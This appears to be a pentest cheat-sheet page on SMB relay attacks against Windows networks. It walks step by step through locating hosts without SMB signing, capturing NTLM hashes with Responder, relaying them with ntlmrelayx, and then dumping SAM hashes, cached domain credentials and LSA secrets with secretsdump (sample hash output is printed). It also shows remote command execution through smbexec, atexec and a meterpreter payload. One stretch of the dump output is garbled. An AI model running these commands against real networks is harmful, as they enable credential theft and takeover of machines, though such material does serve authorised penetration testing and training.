SMB relay

Instead of cracking hashes to find the clear password, you can relay those hashes to specific machines and potentially gain access.
For refreshing our memory about the different types of NTLMs and Relaying 101 and pass-the-hash attack i suggest you read these 2 awesome posts :
Practical guide to NTLM Relaying in 2017 (A.K.A getting a foothold in under 5 minutes) // byt3bl33d3r // /dev/random > blog.py
Pass the Hash Attack Tutorial | Lateral Movement using LanMan or NTLM hashes
Attack Catalog
Now, this attack requires two things :
SMB signing must be disabled on the target
Relayed user credentials must be admin on the machine (we can't relay the hash to the same machine since MS08-068, and the user we're relaying must have admin rights on the target machine if we want code execution otherwise user access if there's an open-share for example)
In order to relay hashes, we must have valid targets. Valid targets are, as predescribed, machines with SMB Signing disabled. So to get a list of those valide targets we can use for example CrackMapExec​
1
cme smb <entire network ip>/<cidr> --gen-relay-list Targets.txt
Copied!
or Nmap :
1
nmap --script=smb2-security-mode.nse -p445 <entire network ip>
Copied!
NOTE: By default, SMB signing is enabled on all DC servers

Now off  to capture the hashes, but we first need to change a little configuration in the responder.conf file (/usr/share/responder/responder.conf)
1
[Responder Core]
2
​
3
; Servers to start
4
SQL = On
5
SMB = Off     # Turn this off
6
Kerberos = On
7
FTP = On
8
POP = On
9
SMTP = On
10
IMAP = On
11
HTTP = Off    # Turn this off
12
HTTPS = On
13
DNS = On
14
LDAP = On
Copied!
Then again fire up responder :
1
python responder.py -I <interface> -rdwv
Copied!
Now off to the relay, pop up a new shell and use ntlmrelayx.py to relay the intercepted hashes :
1
ntlmrelayx.py -tf Targets.txt -socks -smb2support
Copied!
You should be seeing something cool appearing on your ntlmrelay window.
Now while that's cool, what can we do with the opened sessions ? if you tap socks you should see something like that :
1
ntlmrelayx> socks
2
Protocol  Target          Username                  Port
3
--------  --------------  ------------------------  ----
4
SMB       192.168.48.38   VULNERABLE/NORMALUSER3    445
5
MSSQL     192.168.48.230  VULNERABLE/ADMINISTRATOR  1433
6
MSSQL     192.168.48.230  CONTOSO/NORMALUSER1       1433
7
SMB       192.168.48.230  VULNERABLE/ADMINISTRATOR  445
8
SMB       192.168.48.230  CONTOSO/NORMALUSER1       445
9
SMTP      192.168.48.224  VULNERABLE/NORMALUSER3    25
10
SMTP      192.168.48.224  CONTOSO/NORMALUSER1       25
11
IMAP      192.168.48.224  CONTOSO/NORMALUSER1       143
Copied!
To interact with these sessions we'll use the tool proxychains, but first you need to edit the conf file found in /etc/proxychains.conf:
1
[ProxyList]
2
socks4 <yourIP> 1080
Copied!
Now that's done, you can for example retrieve local hashes using secretsdump​
1
# proxychains ./secretsdump.py vulnerable/[email protected]
2
ProxyChains-3.1 (http://proxychains.sf.net)
3
Impacket v0.9.18-dev - Copyright 2002-2018 Core Security Technologies
4
​
5
Password:
6
|S-chain|-<>-192.168.48.1:1080-<><>-192.168.48.230:445-<><>-OK
7
[*] Service RemoteRegistry is in stopped state
8
[*] Starting service RemoteRegistry
9
[*] Target system bootKey: 0xa6016dd8f2ac5de40e5a364848ef880c
10
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
11
Administrator:500:aad3b435b51404eeaad3b435b51404ee:aeb450b6b165aa734af28891f2bcd2ef:::
12
Guest:501:aad3b435b51404eeaad3b435b51404ee:40cb4af33bac0b739dc821583c91f009:::
13
HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:ce6b7945a2ee2e8229a543ddf86d3ceb:::
14
[*] Dumping cached domain logon information (uid:encryptedHash:longDomain:domain)
15
pcadminuser2:6a8bf047b955e0945abb8026b8ce041d:VULNERABLE.CONTOSO.COM:VULNERABLE:::
16
Administrator:82f6813a7f95f4957a5dc202e5827826:VULNERABLE.CONTOSO.COM:VULNERABLE:::
17
normaluser1:b18b40534d62d6474f037893111960b9:CONTOSO.COM:CONTOSO:::
18
serviceaccount:dddb5f4906fd788fc41feb8d485323da:VULNERABLE.CONTOSO.COM:VULNERABLE:::
19
normaluser3:a24a1688c0d71b251efec801fd1e33b1:VULNERABLE.CONTOSO.COM:VULNERABLE:::
20
[*] Dumping LSA Secrets
21
[*] $MACHINE.ACC
22
VULNERABLE\WIN7-A$:aad3b435b51404eeaad3b435b51404ee:ef1ccd3c502bee484cd575341e4e9a38:::
23
[*] DPAPI_SYSTEM
24
 0000   01 00 00 00 1C 17 F6 05  23 2B E5 97 95 E0 E4 DF   ........#+......
25
 0010   47 96 CC 79 1A C2 6E 14  44 A3 C1 9E 6D 7C 93 F3   G..y..n.D...m|..
26
 0020   9A EC C6 8A 49 79 20 9D  B5 FB 26 79               ....Iy ...&y
27
DPAPI_SYSTEM:010000001c17f605232be59795e0e4df4796cc791ac26e1444a3c19e6d7c93f39aecc68a4979209db5fb2679
28
[*] NL$KM
29
 0000   EB 5C 93 44 7B 08 65 27  9A D8 36 75 09 A9 CF B3   .\.D{.e'..6u....
30
 0010   4F AF EC DF 61 63 93 E5  20 C5 4F EF 3C 65 FD 8C   O...ac.. .O.-192.168.48.1:1080-<><>-192.168.48.230:445-<><>-OK
Copied!
Or even get code execution via :
​smbexec, atexec and others 
1
proxychains smbexec.py <domain>/<relayedUser>@192.168.10.60
Copied!
1
proxychains atexec.py <domain>/<relayedUser>@192.168.10.60 "<cmd>"
Copied!
You can even specify the commands you want to execute before launching ntlmrelayx :
1
ntlmrelayx.py -tf targets.txt -socks -smb2support -c "whoami"
Copied!
or even set a meterpreter listeneter and get shell access via metasploit :
1
ntlmrelayx.py -tf targets.txt -socks -smb2support -e test.exe
Copied!
Intercept and Hashcat
IPv6 Attacks
Last modified 2yr ago
Copy link